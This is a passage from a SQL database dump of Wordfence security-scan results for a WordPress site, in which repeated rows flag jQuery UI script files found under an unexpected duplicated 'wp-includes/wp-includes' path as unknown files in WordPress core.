wp-includes/wp-includes/js/jquery/ui/draggable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/draggable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34276,1631564699,1631564699,'new','knownfile',75,'471534b067fbd1989891280f48debb48','5661e63c607ce63486b83ed5413a5193','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/droppable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34277,1631564699,1631564699,'new','knownfile',75,'5e6abbb91dc68290645d4919cfcd405b','d76f0131b4bf89c292db210ee5c47e87','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/droppable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34278,1631564699,1631564699,'new','knownfile',75,'be299856cb84df8cf2d4b4b6b26efca3','e57ef583db84b17bd1c5267d0dfb253f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34279,1631564699,1631564699,'new','knownfile',75,'6428d8809c0b38e135bd54cd4c474f7f','d0686bf29019c0ed99eaccc185de88df','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34280,1631564699,1631564699,'new','knownfile',75,'720d337c9492eb0255fefddc84f8df1c','c32fdfeaeee07b65212b5660e30ead77','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34281,1631564699,1631564699,'new','knownfile',75,'b5a1a75b9d234a82ab974be7e21ee974','a0174b22d4cf82b74ff4ccd606909a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34282,1631564699,1631564699,'new','knownfile',75,'617928190a61cf7c1f30ba0bb0824cb2','43ff2f8954aefda7dc245883297bfa07','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34283,1631564699,1631564699,'new','knownfile',75,'da56661cc628329f68b9fd1f22c6685e','7ea1bf1f05dac090e9a410c5649db402','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34284,1631564699,1631564699,'new','knownfile',75,'70540802e4790e7b361d0a3dad1fd1b5','f14849db960adfe861f8eff004ecf5ea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34285,1631564699,1631564699,'new','knownfile',75,'62124a5242c600dc02789528601ce3ed','8060612cc97f3cca61ab7bc3d31d7dd5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34286,1631564699,1631564699,'new','knownfile',75,'4176eca2d7996f62da4b6b52420924f4','8fede1b43b677e48276cb5f17b7e6790','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34287,1631564699,1631564699,'new','knownfile',75,'e592e5afe1a1fbd57b4f13845d72f4c4','463a57ac13dd3a85f71f34c06f1b1387','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34288,1631564699,1631564699,'new','knownfile',75,'a595bc9070e15cb849bce96763581552','7848bc5fce3a1d5d0d096add814adccc','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34289,1631564699,1631564699,'new','knownfile',75,'2b577027723cf6d53114dcc70853eae1','27948325674b7a28dffce5026e05b188','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34290,1631564699,1631564699,'new','knownfile',75,'699bd5668e60b6dc8b202007288ee440','751d03d63c707f1be366aeb7e21d2a39','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34291,1631564699,1631564699,'new','knownfile',75,'b75d2e0689be54ef3eec39087c3b5d12','936eb42a4233b026b367c4b166eeeb25','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34292,1631564699,1631564699,'new','knownfile',75,'dc5d63cf5c538e6fb1d66fccd9aa4b80','11be3c2190882a88ddac3fa0d1cacd58','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34293,1631564699,1631564699,'new','knownfile',75,'0a448c26b216f8a71efdec7ba2c32a94','eac4452916aa5091f4b05a729f816603','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34294,1631564699,1631564699,'new','knownfile',75,'3beaec3b5a2f0b45e7eb4ca4a4e2c474','1d794bbe410515ab48be8f5cffadd87d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34295,1631564699,1631564699,'new','knownfile',75,'fd7e7499e938b752b4d9f56e01b658f0','ba2fcd013acda27d54e7cb2b214e38a8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34296,1631564699,1631564699,'new','knownfile',75,'1d749fe4f9c5a5ed3d6efa122d932ab7','d10968b47511b5a78fc1da7cabf92647','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34297,1631564699,1631564699,'new','knownfile',75,'63dea87486beadb090f871e135a9fb40','239df9ba8c5081f3d0501194411b88f1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34298,1631564699,1631564699,'new','knownfile',75,'823829a0506ce7c96a6159369a14434f','e2791bc4232932c55805ef75b7f8cae0','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34299,1631564699,1631564699,'new','knownfile',75,'001edd2bf592ce6fc07b016eb0d6f49f','f969ca9c9a3a782c50845b29322aae7e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34300,1631564699,1631564699,'new','knownfile',75,'2b43040b5f09d480fb6cf2aaf3ce8a77','cd69d89d783c2cee9fcfabdbb1a02fa3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34301,1631564699,1631564699,'new','knownfile',75,'761ab3e9dccc32851c30b541988e10db','f8b853b89d49d2cc2c95e982f69e103f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34302,1631564699,1631564699,'new','knownfile',75,'ead7e2d3e2f099d5dff63ac33f8adbba','f576ee98e1dbe56fada9c645ee9459b8','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-size.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34303,1631564700,1631564700,'new','knownfile',75,'b4b2a73070f49984e887923fa1288c65','27e1a423be544209d3a185c85a43cc05','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-size.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-size.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34304,1631564700,1631564700,'new','knownfile',75,'2c0ec6776b1c46eda86fd92e2dde0e01','e3e93d34ab7ca0fc64133c5817f8f638','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34305,1631564700,1631564700,'new','knownfile',75,'59541d2e552a655a1c13217ecfafe6e6','7760c1a7057094063ae2623804c11e0b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34306,1631564700,1631564700,'new','knownfile',75,'d17ec3b3feb307f36b13116fa740334f','8634ad0b57685a4efa16e9d5fccace51','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34307,1631564700,1631564700,'new','knownfile',75,'0a3461e10774bea0860f69a812b47bad','b32c85b6a675574fc9090cbc136e44fb','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34308,1631564700,1631564700,'new','knownfile',75,'3f8f2f536c3f4c138a26088ec7e3abee','4295577415455eecbf56a21ffa0c5403','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/effect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34309,1631564700,1631564700,'new','knownfile',75,'f2dba2820ef254b26e051b0216fdcbd3','dfdbedac49227d2c5b6e40dbea3bbaea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/effect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34310,1631564700,1631564700,'new','knownfile',75,'d8b6e14d89ecd89629cc1d7c32d6de19','68c86b91a54c1ca9d80bbe72e562133a','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/menu.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34311,1631564700,1631564700,'new','knownfile',75,'38b7e14fa4d3902b65cddfb31867e909','f5f8d2041e07ed70dc79911dd666a065','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/menu.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/menu.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34312,1631564700,1631564700,'new','knownfile',75,'52b83048255af01bcfae1842d6812307','51bf87dc2ff80446572376ffdd9cd2ba','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/jquery/ui/mouse.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34313,1631564700,1631564700,'new','knownfile',75,'641642165826b4418bc10cff9b0419fe','4cdffbf9e33b2f0091a476ce5e95f71b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/mouse.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/mouse.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34314,1631564700,1631564700,'new','knownfile',75,'f4374507b78202be304a6063ed15999c','f5d2f6fc010607c91cd063e2780431c5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/progressbar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 